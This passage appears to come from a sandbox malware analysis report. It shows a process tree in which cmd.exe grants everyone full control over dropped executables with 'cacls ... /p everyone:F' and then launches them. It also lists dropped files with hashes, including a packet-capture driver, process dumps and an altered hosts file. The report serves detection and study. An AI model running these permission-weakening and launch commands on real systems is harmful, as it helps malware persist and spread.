                                                                                                                                                    cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2252
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1928
                                                                                                                                                      • C:\Windows\ime\bbleyvb.exe
                                                                                                                                                        C:\Windows\ime\bbleyvb.exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4224
                                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2788
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4440
                                                                                                                                                          • C:\Windows\system32\cacls.exe
                                                                                                                                                            cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4040
                                                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5516
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5528
                                                                                                                                                                • C:\Windows\system32\cacls.exe
                                                                                                                                                                  cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5268
                                                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5496
                                                                                                                                                                    • C:\Windows\ime\bbleyvb.exe
                                                                                                                                                                      C:\Windows\ime\bbleyvb.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:6004

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\Windows\SysWOW64\Packet.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    95KB

                                                                                                                                                                    MD5

                                                                                                                                                                    86316be34481c1ed5b792169312673fd

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                                    SHA256

                                                                                                                                                                    49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                                    SHA512

                                                                                                                                                                    3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                                  • C:\Windows\SysWOW64\wpcap.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    275KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4633b298d57014627831ccac89a2c50b

                                                                                                                                                                    SHA1

                                                                                                                                                                    e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                                    SHA256

                                                                                                                                                                    b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                                    SHA512

                                                                                                                                                                    29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\1020.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    33.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    73eef69287f3d26daa7d50bfc6a05cfd

                                                                                                                                                                    SHA1

                                                                                                                                                                    2c8e6ede811bd685bf797b05ce80e18b8691a6f6

                                                                                                                                                                    SHA256

                                                                                                                                                                    22af18dbed7a4a73bb3b246d48a9662193d852b40f72a3d9d492eb45b1ba31f5

                                                                                                                                                                    SHA512

                                                                                                                                                                    8a8318d8ab58eb33509ae6eddf0abe8bbaceb9d8c866afd676d490b40190eae63da402217efad0c14a84c081184e6fc12ab951fb4423ca22812e03643539d7be

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\1952.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    25.7MB

                                                                                                                                                                    MD5

                                                                                                                                                                    20982ea600d926e404c6878941476bf9

                                                                                                                                                                    SHA1

                                                                                                                                                                    c04c3907bf3106ded5a15d84a85f4951e27690d2

                                                                                                                                                                    SHA256

                                                                                                                                                                    616af3e5f9f447b8bddb59db13678afe12064327d1934d04a08e7e853d69eea2

                                                                                                                                                                    SHA512

                                                                                                                                                                    b8483732cee10ff9d8003ec0f4cb043d3b8f33740242deade79c021dc56e1f55d1c90827b3dfd093fd3b2ee3e5b2e4e008d2fdce49948abd2cb45dcf3578dfb9

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2152.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4.2MB

                                                                                                                                                                    MD5

                                                                                                                                                                    001686aba6c206927c91bcb58a03f367

                                                                                                                                                                    SHA1

                                                                                                                                                                    c7d5be9c2b6bf31674bd590a1287734cfa0db202

                                                                                                                                                                    SHA256

                                                                                                                                                                    20f20ff7b28cf91cf21eb3bd721056d526a7df0b1976f273c2c80e8957243056

                                                                                                                                                                    SHA512

                                                                                                                                                                    1e7ed5c9548ea789703be4d26916de64c23a633b6adf7db748d81609d45a1c1c3e0201f7fdd34e0c289d80d8544ad1f681cb9a6b7677e84f1607d3a43b9ebedd

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2192.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    44.5MB

                                                                                                                                                                    MD5

                                                                                                                                                                    f25a3159a6ae64150930332a5112245f

                                                                                                                                                                    SHA1

                                                                                                                                                                    a4457a7ed33d7fda565d0bc15c354f49fddb6f03

                                                                                                                                                                    SHA256

                                                                                                                                                                    8aac42cfd8db6a4afe49a24aea4f2024e8c7a1c0fc4dfa8b9a80ae27ff2a0897

                                                                                                                                                                    SHA512

                                                                                                                                                                    85acde582a32aa2cf88993bc9d3d2b5d2104e6e45786ef97c3507e6e9d710ae0bc3642f4a844b2ff05bc10220d7a2b06ccb2d0ad438a6160e20f181201d611cc

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2552.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    3.7MB

                                                                                                                                                                    MD5

                                                                                                                                                                    509c89ad074a177fcd93c8ca7da9e0b5

                                                                                                                                                                    SHA1

                                                                                                                                                                    c5adf65b8a0b93a7eca2a580bcd39c4ec8212c08

                                                                                                                                                                    SHA256

                                                                                                                                                                    1aef6babade5d6db13122b9b20975a85ded76e2f8617f722681174d314221564

                                                                                                                                                                    SHA512

                                                                                                                                                                    325a92fda9760265c9a4921e7d3377caeb2180680e5cabe8fd23cb17a5628920a86b300593977010f9d1ec6bd33eef196fe802f6ad6910421a53ac694cbb6f84

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2740.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.2MB

                                                                                                                                                                    MD5

                                                                                                                                                                    2458b470af38c0ac8c3668c81fd1aee1

                                                                                                                                                                    SHA1

                                                                                                                                                                    1e83b9f9f104100d47ae793853e7c5251b3f48e1

                                                                                                                                                                    SHA256

                                                                                                                                                                    0ec3230aa079da05dbc0995b81d4d985f5c9f7d5ce2c9334349937756f3b6165

                                                                                                                                                                    SHA512

                                                                                                                                                                    fe04421b8f29683f41b4dc3de9519ad5d14dcc1e40613ddf1c028bcb56e4602f82f2b11979d224837d6a300fb96097054efa7c7818c89a4237e93d7b09da4632

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2764.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                    MD5

                                                                                                                                                                    7b8f18e3bf210991fa6064e0176b9651

                                                                                                                                                                    SHA1

                                                                                                                                                                    68a334917d908c72b652acb7c4e482382f14876c

                                                                                                                                                                    SHA256

                                                                                                                                                                    313dd1c5a498f1db747d77594d4889644dfde21c51e8ac82b5a446e3ca11c645

                                                                                                                                                                    SHA512

                                                                                                                                                                    1439e3d7a41eef0bb0ccaebf287494bc63f3f7c518c1d99b69b8d208109f67832da07037d0ca9c6d08c180b4bbb5d21b1ebe4cc90f9db92b89221686adb408a9

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\2844.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    3.0MB

                                                                                                                                                                    MD5

                                                                                                                                                                    381c50ea4b86d1ff95ec292baa04f090

                                                                                                                                                                    SHA1

                                                                                                                                                                    b874c4d31a736fcb69a82c955cf697fbb71c69bd

                                                                                                                                                                    SHA256

                                                                                                                                                                    a462f238b2d87aad9596ec1da393f1298f395c1fc406178399cb9ac99b9a61f0

                                                                                                                                                                    SHA512

                                                                                                                                                                    dd68eaf7e56833973e57a195a216c09461502c3dbc4e6832a6a718d5c3b209f6bb82c6f1172cae17fbd670c947fedb6d576fd12e5ceade49265fd1d65e888992

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\3100.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    826KB

                                                                                                                                                                    MD5

                                                                                                                                                                    89c99c51bb9c6043a234c6a1b6461441

                                                                                                                                                                    SHA1

                                                                                                                                                                    1e6f72cabadc60611d2f408ff01284a041ca3599

                                                                                                                                                                    SHA256

                                                                                                                                                                    a9cc5856573fe489876c96f6ccc0f3d69be9685ebac7fed56a793005176cefe6

                                                                                                                                                                    SHA512

                                                                                                                                                                    b92a77e34c12dddd353e4fafe82d29439284b5125d212f45a6c633d2bea7f9b0a23bcdc26aa1ef59a2c30a33c590edd3e6d1a941d81d996555480fb1e10ab024

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\3844.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.5MB

                                                                                                                                                                    MD5

                                                                                                                                                                    af0bf682effb629d7ae7f935f4be318a

                                                                                                                                                                    SHA1

                                                                                                                                                                    3ada0323345b83ebf89a56e43e8f0bc7da957d4e

                                                                                                                                                                    SHA256

                                                                                                                                                                    ed2d50847bbb95a17f4ae7f89722e8ba295f9cdc74c3bf37705534af6d5a8592

                                                                                                                                                                    SHA512

                                                                                                                                                                    a7c9536824916d23f569ec42d4c54ffd587d6f706fb6302914bc81e9233235b0d5ba568b8917f902f24e87e6be3e1dccb2255fdadfeb152dd0432efdcb75b460

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\3980.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    20.5MB

                                                                                                                                                                    MD5

                                                                                                                                                                    c16ef9a90b2668d9aa2d17f08c851300

                                                                                                                                                                    SHA1

                                                                                                                                                                    e902285ac7a0c28e2951ae0c49074a13d57053cc

                                                                                                                                                                    SHA256

                                                                                                                                                                    0d52bf7f2890c51460b4de38dcbe5983d5289d8575d7ace335fe3e7666834ab6

                                                                                                                                                                    SHA512

                                                                                                                                                                    e25559f6d28dfe0790ab221e138016acf9cfe4f247c697a8401db5b2633cf65391c2d726440d66d6dead6c11b31279e19278d1a82f5054ca7e8f6dc16e0517a0

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\4052.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    7e6d216b511e215002af9943f0c8b08c

                                                                                                                                                                    SHA1

                                                                                                                                                                    9210003e5c08e5cd52523d47820b4cbebe3dcda3

                                                                                                                                                                    SHA256

                                                                                                                                                                    8079931013a63747261c854d36b65473ca0be31ba49b5cddd790f1086910ee39

                                                                                                                                                                    SHA512

                                                                                                                                                                    349239a20d355d09f8a5a23a366f75930b6e2bce4403b836771045973912398b56f42abf1355d3cf20685f855b6a6dfcb490a7e68a1d0ef992bfffdc67346fdf

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\5076.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8.7MB

                                                                                                                                                                    MD5

                                                                                                                                                                    69c1b8071e2521b7168bda04c9da4f95

                                                                                                                                                                    SHA1

                                                                                                                                                                    0777e5b1f27b6f2011405fc98593b090ed2cdab0

                                                                                                                                                                    SHA256

                                                                                                                                                                    c1184d56014591600d534a1d74fd8aee86ae73a48f10da8db91adfcdd37752a5

                                                                                                                                                                    SHA512

                                                                                                                                                                    af080f19deba580de4ef67f689ac25597ff5525eb484c51f1cec7022c581f6a43135fab7340b1f2be684d4e1c880afc991c373794beee537430600aaf39097cf

                                                                                                                                                                  • C:\Windows\TEMP\nzlegstrv\780.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    a6a8fab1ca8eb6a1a3b687cff9713938

                                                                                                                                                                    SHA1

                                                                                                                                                                    0fe59737630490f267f62df394faf014a6616b96

                                                                                                                                                                    SHA256

                                                                                                                                                                    573dc94720d303e4b2200b70676a8085d3663f8f130993fbefd809babb4117b7

                                                                                                                                                                    SHA512

                                                                                                                                                                    7feb7807f0eb613ad695e81cc4327e98fc2a096ef71fff47a805d1f4341531488625045b8523e9bbc0e207e7c60432579b9f708695b839439c0897719d98252c

                                                                                                                                                                  • C:\Windows\TEMP\urfucfzpe\config.json

                                                                                                                                                                    Filesize

                                                                                                                                                                    693B

                                                                                                                                                                    MD5

                                                                                                                                                                    f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                                    SHA1

                                                                                                                                                                    08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                                    SHA256

                                                                                                                                                                    d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                                    SHA512

                                                                                                                                                                    2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                                  • C:\Windows\Temp\nsbD5FF.tmp\System.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                                                                    SHA1

                                                                                                                                                                    98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                                                                    SHA256

                                                                                                                                                                    681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                                                                    SHA512

                                                                                                                                                                    2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                                                                  • C:\Windows\Temp\nsbD5FF.tmp\nsExec.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    b648c78981c02c434d6a04d4422a6198

                                                                                                                                                                    SHA1

                                                                                                                                                                    74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                                                                    SHA256

                                                                                                                                                                    3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                                                                    SHA512

                                                                                                                                                                    219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                                                                  • C:\Windows\Temp\nzlegstrv\hmuzmiedp.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    126KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e8d45731654929413d79b3818d6a5011

                                                                                                                                                                    SHA1

                                                                                                                                                                    23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                                                                    SHA256

                                                                                                                                                                    a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                                                                    SHA512

                                                                                                                                                                    df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                                                                  • C:\Windows\Temp\urfucfzpe\ecfkkq.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    343KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2b4ac7b362261cb3f6f9583751708064

                                                                                                                                                                    SHA1

                                                                                                                                                                    b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                                                                    SHA256

                                                                                                                                                                    a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                                                                    SHA512

                                                                                                                                                                    c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                                                                  • C:\Windows\Temp\xohudmc.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    72KB

                                                                                                                                                                    MD5

                                                                                                                                                                    cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                                                                    SHA1

                                                                                                                                                                    73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                                                                    SHA256

                                                                                                                                                                    7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                                                                    SHA512

                                                                                                                                                                    b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                                                                  • C:\Windows\kmydietv\bbleyvb.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6ff8fd0e778f2eec0fd8273c9b960d83

                                                                                                                                                                    SHA1

                                                                                                                                                                    f66353d9930567bd820c70c3994127b70448ca32

                                                                                                                                                                    SHA256

                                                                                                                                                                    4a033c7f18b48fb0c15467aa708dfd43629028f3fdf193f7ae699d299031cbfb

                                                                                                                                                                    SHA512

                                                                                                                                                                    24d69e56666f970953d460e0fd93c0ff2107d3ed38b26b190372935d93fe1417c456d3bf5f8250f70039aeac21e0832df6bb56b890d6671824834d6ddf215692

                                                                                                                                                                  • C:\Windows\nzlegstrv\Corporate\vfshost.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    381KB

                                                                                                                                                                    MD5

                                                                                                                                                                    fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                                                                    SHA1

                                                                                                                                                                    51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                                                                    SHA256

                                                                                                                                                                    441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                                                                                                                    SHA512

                                                                                                                                                                    74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                                                                                                                                  • C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    332KB

                                                                                                                                                                    MD5

                                                                                                                                                                    ea774c81fe7b5d9708caa278cf3f3c68

                                                                                                                                                                    SHA1

                                                                                                                                                                    fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                                                                                                                    SHA256

                                                                                                                                                                    4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                                                                                                                                    SHA512

                                                                                                                                                                    7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                                                                                                                                  • C:\Windows\nzlegstrv\yuiezklii\wpcap.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    424KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e9c001647c67e12666f27f9984778ad6

                                                                                                                                                                    SHA1

                                                                                                                                                                    51961af0a52a2cc3ff2c4149f8d7011490051977

                                                                                                                                                                    SHA256

                                                                                                                                                                    7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                                                                                                                                    SHA512

                                                                                                                                                                    56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                                                                                                                                  • C:\Windows\system32\drivers\etc\hosts

                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c838e174298c403c2bbdf3cb4bdbb597

                                                                                                                                                                    SHA1

                                                                                                                                                                    70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                                                                                    SHA256

                                                                                                                                                                    1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                                                                                    SHA512

                                                                                                                                                                    c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                                                                                  • memory/760-184-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/776-180-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/872-151-0x000002202D4D0000-0x000002202D4D4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-178-0x000002202D4D0000-0x000002202D4D4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-153-0x000002202E0A0000-0x000002202E0A4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-152-0x000002202D6B0000-0x000002202D6B4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-150-0x000002202D4C0000-0x000002202D4D0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-147-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.1MB

                                                                                                                                                                  • memory/920-205-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1252-210-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1276-188-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1292-140-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1292-143-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/1668-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.6MB

                                                                                                                                                                  • memory/2024-219-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2248-197-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2264-233-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2448-201-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/2508-162-0x0000000010000000-0x0000000010008000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/3044-244-0x0000000000C00000-0x0000000000C12000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    72KB

                                                                                                                                                                  • memory/3944-156-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4564-77-0x0000000001030000-0x000000000107C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/4576-248-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4640-223-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4652-214-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    952KB

                                                                                                                                                                  • memory/4740-135-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    952KB

                                                                                                                                                                  • memory/4860-174-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4952-7-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.6MB

                                                                                                                                                                  • memory/5012-228-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/5060-231-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/5540-246-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB